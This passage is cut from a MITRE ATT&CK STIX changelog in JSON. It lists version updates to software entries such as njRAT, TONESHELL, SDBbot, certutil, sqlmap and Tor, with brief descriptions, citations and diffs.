                            "url": "https://attack.mitre.org/software/S1239",
                            "external_id": "S1239"
                        },
                        {
                            "source_name": "ATTACKIQ MUSTANG PANDA TONESHELL March 2023",
                            "description": "Ken Towne, Francis Guibernau. (2023, March 23). Emulating the Politically Motivated Chinese APT Mustang Panda. Retrieved September 10, 2025.",
                            "url": "https://www.attackiq.com/2023/03/23/emulating-the-politically-motivated-chinese-apt-mustang-panda/"
                        },
                        {
                            "source_name": "Palo Alto Unit42 STATELY TAURUS TONESHELL September 2023",
                            "description": "Lior Rochberger, Tom Fakterman, Robert Falcone. (2023, September 22). Cyberespionage Attacks Against Southeast Asian Government Linked to Stately Taurus, Aka Mustang Panda. Retrieved September 9, 2025.",
                            "url": "https://unit42.paloaltonetworks.com/stately-taurus-attacks-se-asian-government/"
                        },
                        {
                            "source_name": "Zscaler",
                            "description": "Sudeep Singh. (2025, April 16). Latest Mustang Panda Arsenal: ToneShell and StarProxy | P1. Retrieved July 21, 2025.",
                            "url": "https://www.zscaler.com/blogs/security-research/latest-mustang-panda-arsenal-toneshell-and-starproxy-p1"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_aliases": [
                        "TONESHELL"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "YH Chang, ZScaler",
                        "ZScaler"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Windows"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-08 13:49:07.222000+00:00\", \"old_value\": \"2025-10-21 22:46:53.202000+00:00\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1"
                },
                {
                    "type": "tool",
                    "id": "tool--2e45723a-31da-4a7e-aaa6-e01998a6788f",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2017-05-31 21:32:39.233000+00:00",
                    "modified": "2026-04-17 14:20:48.948000+00:00",
                    "name": "Tasklist",
                    "description": "The [Tasklist](https://attack.mitre.org/software/S0057) utility displays a list of applications and services with their Process IDs (PID) for all tasks running on either a local or a remote computer. It is packaged with Windows operating systems and can be executed from the command-line interface. (Citation: Microsoft Tasklist)",
                    "revoked": false,
                    "labels": [
                        "tool"
                    ],
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/software/S0057",
                            "external_id": "S0057"
                        },
                        {
                            "source_name": "Microsoft Tasklist",
                            "description": "Microsoft. (n.d.). Tasklist. Retrieved December 23, 2015.",
                            "url": "https://technet.microsoft.com/en-us/library/bb491010.aspx"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_aliases": [
                        "Tasklist"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "1.3",
                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-17 14:20:48.948000+00:00\", \"old_value\": \"2024-02-12 19:14:37.984000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.3\", \"old_value\": \"1.2\"}}}",
                    "previous_version": "1.2",
                    "version_change": "1.2 \u2192 1.3"
                },
                {
                    "type": "tool",
                    "id": "tool--ed7d0cb1-87a6-43b4-9f46-ef1bc56d6c68",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2018-01-16 16:13:52.465000+00:00",
                    "modified": "2026-04-22 21:19:41.095000+00:00",
                    "name": "Tor",
                    "description": "[Tor](https://attack.mitre.org/software/S0183) is a software suite and network that provides increased anonymity on the Internet. It creates a multi-hop proxy network and utilizes multilayer encryption to protect both the message and routing information. [Tor](https://attack.mitre.org/software/S0183) utilizes \"Onion Routing,\" in which messages are encrypted with multiple layers of encryption; at each step in the proxy network, the topmost layer is decrypted and the contents forwarded on to the next node until it reaches its destination. (Citation: Dingledine Tor The Second-Generation Onion Router)",
                    "revoked": false,
                    "labels": [
                        "tool"
                    ],
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/software/S0183",
                            "external_id": "S0183"
                        },
                        {
                            "source_name": "Tor",
                            "description": "(Citation: Dingledine Tor The Second-Generation Onion Router)"
                        },
                        {
                            "source_name": "Dingledine Tor The Second-Generation Onion Router",
                            "description": "Roger Dingledine, Nick Mathewson and Paul Syverson. (2004). Tor: The Second-Generation Onion Router. Retrieved December 21, 2017.",
                            "url": "http://www.dtic.mil/dtic/tr/fulltext/u2/a465464.pdf"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_aliases": [
                        "Tor"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Linux",
                        "Windows",
                        "macOS"
                    ],
                    "x_mitre_version": "1.5",
                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-22 21:19:41.095000+00:00\", \"old_value\": \"2025-09-29 20:22:30.453000+00:00\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.5\", \"old_value\": \"1.4\"}}}",
                    "previous_version": "1.4",
                    "version_change": "1.4 \u2192 1.5"
                },
                {
                    "type": "tool",
                    "id": "tool--f91162cc-1686-4ff8-8115-bf3f61a4cc7a",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2021-09-14 21:45:30.280000+00:00",
                    "modified": "2026-04-17 14:19:59.238000+00:00",
                    "name": "Wevtutil",
                    "description": "[Wevtutil](https://attack.mitre.org/software/S0645) is a Windows command-line utility that enables administrators to retrieve information about event logs and publishers.(Citation: Wevtutil Microsoft Documentation)",
                    "revoked": false,
                    "labels": [
                        "tool"
                    ],
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/software/S0645",
                            "external_id": "S0645"
                        },
                        {
                            "source_name": "Wevtutil Microsoft Documentation",
                            "description": "Microsoft. (n.d.). wevtutil. Retrieved September 14, 2021.",
                            "url": "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_aliases": [
                        "Wevtutil"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Viren Chaudhari, Qualys",
                        "Harshal Tupsamudre, Qualys"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Windows"
                    ],
                    "x_mitre_version": "1.3",
                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-17 14:19:59.238000+00:00\", \"old_value\": \"2024-09-25 20:32:25.006000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.3\", \"old_value\": \"1.2\"}}}",
                    "previous_version": "1.2",
                    "version_change": "1.2 \u2192 1.3"
                },
                {
                    "type": "tool",
                    "id": "tool--0a68f1f1-da74-4d28-8d9a-696c082706cc",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2017-12-14 16:46:06.044000+00:00",
                    "modified": "2026-04-22 21:03:22.466000+00:00",
                    "name": "certutil",
                    "description": "[certutil](https://attack.mitre.org/software/S0160) is a command-line utility that can be used to obtain certificate authority information and configure Certificate Services. (Citation: TechNet Certutil)",
                    "revoked": false,
                    "labels": [
                        "tool"
                    ],
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/software/S0160",
                            "external_id": "S0160"
                        },
                        {
                            "source_name": "TechNet Certutil",
                            "description": "Microsoft. (2012, November 14). Certutil. Retrieved July 3, 2017.",
                            "url": "https://technet.microsoft.com/library/cc732443.aspx"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_aliases": [
                        "certutil",
                        "certutil.exe"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Windows"
                    ],
                    "x_mitre_version": "1.6",
                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-22 21:03:22.466000+00:00\", \"old_value\": \"2024-11-27 21:56:15.800000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.6\", \"old_value\": \"1.5\"}}}",
                    "previous_version": "1.5",
                    "version_change": "1.5 \u2192 1.6"
                },
                {
                    "type": "tool",
                    "id": "tool--294e2560-bd48-44b2-9da2-833b5588ad11",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2017-05-31 21:33:02.863000+00:00",
                    "modified": "2026-04-17 14:12:13.437000+00:00",
                    "name": "ipconfig",
                    "description": "[ipconfig](https://attack.mitre.org/software/S0100) is a Windows utility that can be used to find information about a system's TCP/IP, DNS, DHCP, and adapter configuration. (Citation: TechNet Ipconfig)",
                    "revoked": false,
                    "labels": [
                        "tool"
                    ],
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/software/S0100",
                            "external_id": "S0100"
                        },
                        {
                            "source_name": "TechNet Ipconfig",
                            "description": "Microsoft. (n.d.). Ipconfig. Retrieved April 17, 2016.",
                            "url": "https://technet.microsoft.com/en-us/library/bb490921.aspx"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_aliases": [
                        "ipconfig"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "1.2",
                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-17 14:12:13.437000+00:00\", \"old_value\": \"2025-04-16 20:38:50.417000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.2\", \"old_value\": \"1.1\"}}}",
                    "previous_version": "1.1",
                    "version_change": "1.1 \u2192 1.2"
                },
                {
                    "type": "malware",
                    "id": "malware--d906e6f7-434c-44c0-b51a-ed50af8f7945",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2019-06-04 17:52:28.806000+00:00",
                    "modified": "2026-04-16 15:13:03.813000+00:00",
                    "name": "njRAT",
                    "description": "[njRAT](https://attack.mitre.org/software/S0385) is a remote access tool (RAT) that was first observed in 2012. It has been used by threat actors in the Middle East.(Citation: Fidelis njRAT June 2013)",
                    "revoked": false,
                    "labels": [
                        "malware"
                    ],
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/software/S0385",
                            "external_id": "S0385"
                        },
                        {
                            "source_name": "LV",
                            "description": "(Citation: Fidelis njRAT June 2013)"
                        },
                        {
                            "source_name": "Bladabindi",
                            "description": "(Citation: Fidelis njRAT June 2013)(Citation: Trend Micro njRAT 2018)"
                        },
                        {
                            "source_name": "FireEye Njw0rm Aug 2013",
                            "description": "Dawda, U. and Villeneuve, N. (2013, August 30). Njw0rm - Brother From the Same Mother. Retrieved November 17, 2024.",
                            "url": "https://web.archive.org/web/20200302085808/https://www.fireeye.com/blog/threat-research/2013/08/njw0rm-brother-from-the-same-mother.html"
                        },
                        {
                            "source_name": "Fidelis njRAT June 2013",
                            "description": "Fidelis Cybersecurity. (2013, June 28). Fidelis Threat Advisory #1009: \"njRAT\" Uncovered. Retrieved June 4, 2019.",
                            "url": "https://www.threatminer.org/_reports/2013/fta-1009---njrat-uncovered-1.pdf"
                        },
                        {
                            "source_name": "Trend Micro njRAT 2018",
                            "description": "Pascual, C. (2018, November 27). AutoIt-Compiled Worm Affecting Removable Media Delivers Fileless Version of BLADABINDI/njRAT Backdoor. Retrieved June 4, 2019.",
                            "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/autoit-compiled-worm-affecting-removable-media-delivers-fileless-version-of-bladabindi-njrat-backdoor/"
                        },
                        {
                            "source_name": "Njw0rm",
                            "description": "Some sources have discussed Njw0rm as a later variant of [njRAT](https://attack.mitre.org/software/S0385), where Njw0rm adds the ability to spread via removable devices such as USB drives.(Citation: FireEye Njw0rm Aug 2013) Other sources contain that functionality in their description of [njRAT](https://attack.mitre.org/software/S0385) itself.(Citation: Fidelis njRAT June 2013)(Citation: Trend Micro njRAT 2018)"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_aliases": [
                        "njRAT",
                        "Njw0rm",
                        "LV",
                        "Bladabindi"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Windows"
                    ],
                    "x_mitre_version": "1.7",
                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-16 15:13:03.813000+00:00\", \"old_value\": \"2024-11-17 16:13:48.723000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.7\", \"old_value\": \"1.6\"}}}",
                    "previous_version": "1.6",
                    "version_change": "1.6 \u2192 1.7"
                },
                {
                    "type": "tool",
                    "id": "tool--9a2640c2-9f43-46fe-b13f-bde881e55555",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2018-04-18 17:59:24.739000+00:00",
                    "modified": "2026-04-19 18:21:12.122000+00:00",
                    "name": "sqlmap",
                    "description": "[sqlmap](https://attack.mitre.org/software/S0225) is an open source penetration testing tool that can be used to automate the process of detecting and exploiting SQL injection flaws. (Citation: sqlmap Introduction)",
                    "revoked": false,
                    "labels": [
                        "tool"
                    ],
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/software/S0225",
                            "external_id": "S0225"
                        },
                        {
                            "source_name": "sqlmap Introduction",
                            "description": "Damele, B., Stampar, M. (n.d.). sqlmap. Retrieved March 19, 2018.",
                            "url": "http://sqlmap.org/"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_aliases": [
                        "sqlmap"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_aliases']\": [\"sqlmap\"]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-19 18:21:12.122000+00:00\", \"old_value\": \"2025-04-25 14:45:24.383000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1"
                }
            ],
            "other_version_changes": [],
            "patches": [
                {
                    "type": "malware",
                    "id": "malware--2cf7dec3-66fc-423f-b2c7-58f1de243b4e",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-12-02 20:48:23.462000+00:00",
                    "modified": "2026-01-20 15:11:37.735000+00:00",
                    "name": "HyperStack",
                    "description": "[HyperStack](https://attack.mitre.org/software/S0537) is a RPC-based backdoor used by [Turla](https://attack.mitre.org/groups/G0010) since at least 2018. [HyperStack](https://attack.mitre.org/software/S0537) has similarities to other backdoors used by [Turla](https://attack.mitre.org/groups/G0010) including [Carbon](https://attack.mitre.org/software/S0335).(Citation: Accenture HyperStack October 2020)",
                    "revoked": false,
                    "labels": [
                        "malware"
                    ],
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/software/S0537",
                            "external_id": "S0537"
                        },
                        {
                            "source_name": "Accenture HyperStack October 2020",
                            "description": "Accenture. (2020, October). Turla uses HyperStack, Carbon, and Kazuar to compromise government entity. Retrieved December 2, 2020.",
                            "url": "https://web.archive.org/web/20201101015247/https://www.accenture.com/us-en/blogs/cyber-defense/turla-belugasturgeon-compromises-government-entity"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_aliases": [
                        "HyperStack"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Windows"
                    ],
                    "x_mitre_version": "1.0",
                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-01-20 15:11:37.735000+00:00\", \"old_value\": \"2025-04-25 14:42:55.977000+00:00\"}, \"root['external_references'][1]['url']\": {\"new_value\": \"https://web.archive.org/web/20201101015247/https://www.accenture.com/us-en/blogs/cyber-defense/turla-belugasturgeon-compromises-government-entity\", \"old_value\": \"https://www.accenture.com/us-en/blogs/cyber-defense/turla-belugasturgeon-compromises-government-entity\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
                    "previous_version": "1.0"
                },
                {
                    "type": "tool",
                    "id": "tool--975737f1-b10d-476f-8bda-3ec26ea57172",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-08-13 17:15:25.702000+00:00",
                    "modified": "2026-04-17 14:07:56.328000+00:00",
                    "name": "MCMD",
                    "description": "[MCMD](https://attack.mitre.org/software/S0500) is a remote access tool that provides remote command shell capability used by [Dragonfly](https://attack.mitre.org/groups/G0035).(Citation: Secureworks MCMD July 2019)",
                    "revoked": false,
                    "labels": [
                        "tool"
                    ],
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/software/S0500",
                            "external_id": "S0500"
                        },
                        {
                            "source_name": "Secureworks MCMD July 2019",
                            "description": "Secureworks. (2019, July 24). MCMD Malware Analysis. Retrieved August 13, 2020.",
                            "url": "https://www.secureworks.com/research/mcmd-malware-analysis"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_aliases": [
                        "MCMD"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Windows"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-17 14:07:56.328000+00:00\", \"old_value\": \"2025-04-16 20:38:54.178000+00:00\"}, \"root['description']\": {\"new_value\": \"[MCMD](https://attack.mitre.org/software/S0500) is a remote access tool that provides remote command shell capability used by [Dragonfly](https://attack.mitre.org/groups/G0035).(Citation: Secureworks MCMD July 2019)\", \"old_value\": \"[MCMD](https://attack.mitre.org/software/S0500) is a remote access tool that provides remote command shell capability used by [Dragonfly 2.0](https://attack.mitre.org/groups/G0074).(Citation: Secureworks MCMD July 2019)\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
                    "previous_version": "1.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to43__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to43__0\"><a href=\"#difflib_chg_to43__top\">t</a></td><td class=\"diff_header\" id=\"from43_1\">1</td><td nowrap=\"nowrap\">[MCMD](https://attack.mitre.org/software/S0500)&nbsp;is&nbsp;a&nbsp;remote&nbsp;</td><td class=\"diff_next\"><a href=\"#difflib_chg_to43__top\">t</a></td><td class=\"diff_header\" id=\"to43_1\">1</td><td nowrap=\"nowrap\">[MCMD](https://attack.mitre.org/software/S0500)&nbsp;is&nbsp;a&nbsp;remote&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">access&nbsp;tool&nbsp;that&nbsp;provides&nbsp;remote&nbsp;command&nbsp;shell&nbsp;capability&nbsp;us</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">access&nbsp;tool&nbsp;that&nbsp;provides&nbsp;remote&nbsp;command&nbsp;shell&nbsp;capability&nbsp;us</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ed&nbsp;by&nbsp;[Dragonfly<span class=\"diff_sub\">&nbsp;2.0</span>](https://attack.mitre.org/groups/G00<span class=\"diff_chg\">74</span>)</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ed&nbsp;by&nbsp;[Dragonfly](https://attack.mitre.org/groups/G00<span class=\"diff_chg\">35</span>).(Ci</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">.(Citation:&nbsp;Secureworks&nbsp;MCMD&nbsp;July&nbsp;2019)</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">tation:&nbsp;Secureworks&nbsp;MCMD&nbsp;July&nbsp;2019)</td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "malware",
                    "id": "malware--f6d1d2cb-12f5-4221-9636-44606ea1f3f8",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2018-01-16 16:13:52.465000+00:00",
                    "modified": "2026-01-20 15:46:53.918000+00:00",
                    "name": "OSInfo",
                    "description": "[OSInfo](https://attack.mitre.org/software/S0165) is a custom tool used by [APT3](https://attack.mitre.org/groups/G0022) to do internal discovery on a victim's computer and network. (Citation: Symantec Buckeye)",
                    "revoked": false,
                    "labels": [
                        "malware"
                    ],
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/software/S0165",
                            "external_id": "S0165"
                        },
                        {
                            "source_name": "Symantec Buckeye",
                            "description": "Symantec Security Response. (2016, September 6). Buckeye cyberespionage group shifts gaze from US to Hong Kong. Retrieved September 26, 2016.",
                            "url": "https://web.archive.org/web/20160910124439/http://www.symantec.com/connect/blogs/buckeye-cyberespionage-group-shifts-gaze-us-hong-kong"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_aliases": [
                        "OSInfo"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Windows"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-01-20 15:46:53.918000+00:00\", \"old_value\": \"2025-04-25 14:45:06.283000+00:00\"}, \"root['external_references'][1]['url']\": {\"new_value\": \"https://web.archive.org/web/20160910124439/http://www.symantec.com/connect/blogs/buckeye-cyberespionage-group-shifts-gaze-us-hong-kong\", \"old_value\": \"http://www.symantec.com/connect/blogs/buckeye-cyberespionage-group-shifts-gaze-us-hong-kong\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
                    "previous_version": "1.1"
                },
                {
                    "type": "malware",
                    "id": "malware--4e6b9625-bbda-4d96-a652-b3bb45453f26",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2018-01-16 16:13:52.465000+00:00",
                    "modified": "2026-01-20 15:46:53.918000+00:00",
                    "name": "RemoteCMD",
                    "description": "[RemoteCMD](https://attack.mitre.org/software/S0166) is a custom tool used by [APT3](https://attack.mitre.org/groups/G0022) to execute commands on a remote system similar to SysInternal's PSEXEC functionality. (Citation: Symantec Buckeye)",
                    "revoked": false,
                    "labels": [
                        "malware"
                    ],
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/software/S0166",
                            "external_id": "S0166"
                        },
                        {
                            "source_name": "Symantec Buckeye",
                            "description": "Symantec Security Response. (2016, September 6). Buckeye cyberespionage group shifts gaze from US to Hong Kong. Retrieved September 26, 2016.",
                            "url": "https://web.archive.org/web/20160910124439/http://www.symantec.com/connect/blogs/buckeye-cyberespionage-group-shifts-gaze-us-hong-kong"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_aliases": [
                        "RemoteCMD"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Windows"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-01-20 15:46:53.918000+00:00\", \"old_value\": \"2025-04-25 14:43:16.265000+00:00\"}, \"root['external_references'][1]['url']\": {\"new_value\": \"https://web.archive.org/web/20160910124439/http://www.symantec.com/connect/blogs/buckeye-cyberespionage-group-shifts-gaze-us-hong-kong\", \"old_value\": \"http://www.symantec.com/connect/blogs/buckeye-cyberespionage-group-shifts-gaze-us-hong-kong\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
                    "previous_version": "1.1"
                },
                {
                    "type": "malware",
                    "id": "malware--92b03a94-7147-4952-9d5a-b4d24da7487c",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-06-01 12:29:05.241000+00:00",
                    "modified": "2026-01-20 15:50:34.668000+00:00",
                    "name": "SDBbot",
                    "description": "[SDBbot](https://attack.mitre.org/software/S0461) is a backdoor with installer and loader components that has been used by [TA505](https://attack.mitre.org/groups/G0092) since at least 2019.(Citation: Proofpoint TA505 October 2019)(Citation: IBM TA505 April 2020)",
                    "revoked": false,
                    "labels": [
                        "malware"
                    ],
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/software/S0461",
                            "external_id": "S0461"
                        },
                        {
                            "source_name": "IBM TA505 April 2020",
                            "description": "Frydrych, M. (2020, April 14). TA505 Continues to Infect Networks With SDBbot RAT. Retrieved May 29, 2020.",
                            "url": "https://web.archive.org/web/20200420201624/https://securityintelligence.com/posts/ta505-continues-to-infect-networks-with-sdbbot-rat/"
                        },
                        {
                            "source_name": "Proofpoint TA505 October 2019",
